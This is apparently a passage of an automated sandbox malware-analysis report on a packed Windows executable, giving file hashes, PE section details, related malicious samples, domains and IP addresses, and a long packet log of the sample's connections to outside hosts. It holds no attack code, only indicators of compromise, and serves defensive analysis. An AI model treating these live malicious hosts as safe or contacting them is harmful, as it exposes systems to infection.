                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            34.147.147.173XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            34.200.57.114joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                              Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                  r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                    ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      home.fortth14vs.topXJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                      • 34.147.147.173
                                      Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                      • 34.147.147.173
                                      r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                      • 91.149.241.220
                                      yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                      • 91.149.241.220
                                      ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                      • 91.149.241.220
                                      Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                      • 91.149.241.220
                                      httpbin.orgPrs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      AMAZON-AESUSPrs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                      • 34.200.57.114
                                      ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                      • 34.197.122.172
                                      ATGS-MMD-ASUSXJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                      • 34.147.147.173
                                      Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                      • 34.147.147.173
                                      http://usps.com-trackaddn.top/lGet hashmaliciousUnknownBrowse
                                      • 34.54.88.138
                                      cbr.x86.elfGet hashmaliciousMiraiBrowse
                                      • 57.13.227.38
                                      https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                      • 34.36.178.232
                                      kwari.ppc.elfGet hashmaliciousUnknownBrowse
                                      • 48.233.101.215
                                      kwari.arm.elfGet hashmaliciousUnknownBrowse
                                      • 57.204.182.195
                                      kwari.mpsl.elfGet hashmaliciousUnknownBrowse
                                      • 57.206.149.213
                                      kwari.arm7.elfGet hashmaliciousMiraiBrowse
                                      • 34.31.161.194
                                      https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                      • 57.182.72.119

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                      Entropy (8bit):7.986149120630873
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • VXD Driver (31/22) 0.00%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:TX5LAYBZRI.exe
                                      File size:4'485'632 bytes
                                      MD5:94dfcba69551e571570208f53fac90d6
                                      SHA1:2280c39c446cef46be9388ff3124f6e9c61f7622
                                      SHA256:41e22386a926fc18dbc6d5a3b37fb560463965dd7539c9cf0b67974dd69882fe
                                      SHA512:1d84b9c68c28f9c412bc5449479b9c01ae3295e1797a47d0d7d8907194645de0652d49d3697a4ad925c2c6e466bc1fa9fcb295b2bc4209c40ca2c10d9bfd8f73
                                      SSDEEP:49152:Az0ymb9cp4eo2VoIRjdQn6f+Bmk8l4wQiF1IMGl/J8xoxeSKcC5wzGgtYWpgBex9:AA7OLoijKG3WwQizIi2xeSH7pV1RAT
                                      TLSH:522633358EF14D4FF44E833351EE9463BA73568007332F2EA8F8A0559D22957636E86B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2............M...@..................................;E...@... ............................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x109d000
                                      Entrypoint Section:.taggant
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                      DLL Characteristics:DYNAMIC_BASE
                                      Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Authenticode Signature

                                      Signature Valid:
                                      Signature Issuer:
                                      Signature Validation Error:
                                      Error Number:
                                      Not Before, Not After
                                        Subject Chain
                                          Version:
                                          Thumbprint MD5:
                                          Thumbprint SHA-1:
                                          Thumbprint SHA-256:
                                          Serial:

                                          Entrypoint Preview

                                          Instruction
                                          jmp 00007FF108B5CE5Ah

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74c05f0x73.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x74b0000x2b0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x7782000x688
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc9b3380x10abkqriqx
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0xc9b2e80x18abkqriqx
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          0x10000x74a0000x289000ef50d79a971a369dba13f9e89eee708eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x74b0000x2b00x200053f6048d9fd24083ba2fb62a1447dcaFalse0.796875data6.039196428779676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata 0x74c0000x10000x20052564c2cea63394dbc4e71775ebabcc0False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          0x74d0000x3940000x20030abfd99a24924817bb3eef2542f1a75unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          abkqriqx0xae10000x1bb0000x1ba600365756304dcc6c59d6f61e0a1693c46dFalse0.9942570729725911data7.95457753765941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          csfzocsp0xc9c0000x10000x400625a4cfe52f6153c8003a9c63f86f870False0.80859375data6.294237469572895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .taggant0xc9d0000x30000x2200044b6e5bad2ad6f267d681473709d6b5False0.0646829044117647DOS executable (COM)0.7499271449084802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_MANIFEST0xc9b3480x256ASCII text, with CRLF line terminators0.5100334448160535

                                          Imports

                                          DLLImport
                                          kernel32.dlllstrcpy

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 31, 2024 15:47:01.288567066 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:01.288611889 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:01.288670063 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:01.308451891 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:01.308474064 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:02.005373001 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:02.005847931 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:02.005872965 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:02.008187056 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:02.008250952 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:02.009784937 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:02.009880066 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:02.015402079 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:02.015410900 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:02.068397045 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:02.722023964 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:02.722404957 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:02.722484112 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:02.737337112 CET49704443192.168.2.534.200.57.114
                                          Dec 31, 2024 15:47:02.737359047 CET4434970434.200.57.114192.168.2.5
                                          Dec 31, 2024 15:47:03.622034073 CET4970553192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:03.626854897 CET53497051.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:03.626939058 CET4970553192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:03.627711058 CET4970553192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:03.632488966 CET53497051.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:04.330909014 CET53497051.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:04.331582069 CET4970553192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:04.331835032 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.336628914 CET53497051.1.1.1192.168.2.5
                                          Dec 31, 2024 15:47:04.336641073 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.336704016 CET4970553192.168.2.51.1.1.1
                                          Dec 31, 2024 15:47:04.336735964 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.337905884 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.342823029 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.342833042 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.342843056 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.342852116 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.342869997 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.342878103 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.342930079 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.342936993 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.342938900 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.342978001 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.343005896 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.346235037 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.346245050 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.346297979 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.347727060 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.347735882 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.347769976 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.347779036 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.347780943 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.347788095 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.347811937 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.347814083 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.347836971 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.347860098 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.391457081 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.391623020 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.443437099 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.443526983 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.495503902 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.495558023 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.543433905 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.543489933 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.595468998 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.595539093 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.643424988 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.643476009 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.691492081 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.691571951 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.739439964 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.739510059 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.776839972 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.777043104 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.781970024 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.781984091 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782001972 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782011986 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782032967 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782037020 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782046080 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782068014 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782093048 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782094002 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782103062 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782119989 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782129049 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782149076 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782177925 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782211065 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782221079 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782232046 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782269001 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782270908 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782285929 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782315969 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782321930 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782360077 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782366991 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782404900 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782449007 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782505035 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782540083 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782588005 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782639980 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782668114 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782728910 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782738924 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782789946 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782829046 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782847881 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782902002 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782919884 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.782943964 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.782988071 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.786798954 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.786854029 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.786911011 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.786943913 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.786962986 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.786992073 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.786993027 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787040949 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.787041903 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787163019 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787173033 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787184000 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787210941 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787262917 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787316084 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787360907 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787370920 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787424088 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787434101 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787491083 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787501097 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787512064 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787580967 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787590981 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787595987 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787621975 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787631989 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787785053 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787796021 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787839890 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787848949 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787904978 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.787919998 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787930012 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787976980 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.787982941 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.787992954 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788017988 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788027048 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788032055 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.788062096 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.788068056 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788078070 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788110018 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788119078 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788157940 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788167953 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788202047 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788213015 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788239956 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788249016 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788288116 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788297892 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788312912 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788321972 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788337946 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788346052 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788367987 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788377047 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788420916 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788429976 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788461924 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788470984 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788496971 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788505077 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788583040 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788590908 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788599014 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788608074 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788654089 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788662910 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788768053 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788778067 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788794041 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788803101 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.788813114 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.791793108 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.791809082 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.791817904 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.791826963 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.791837931 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.791871071 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.791881084 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.791891098 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.792774916 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.792787075 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.792908907 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.792920113 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.792937994 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.792947054 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.792993069 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793003082 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793029070 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.793106079 CET4970680192.168.2.534.147.147.173
                                          Dec 31, 2024 15:47:04.793107033 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793117046 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793142080 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793152094 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793183088 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793241978 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793257952 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793282032 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793366909 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793376923 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793441057 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793451071 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793493032 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793502092 CET804970634.147.147.173192.168.2.5
                                          Dec 31, 2024 15:47:04.793560982 CET804970634.147.147.173192.168.2.5
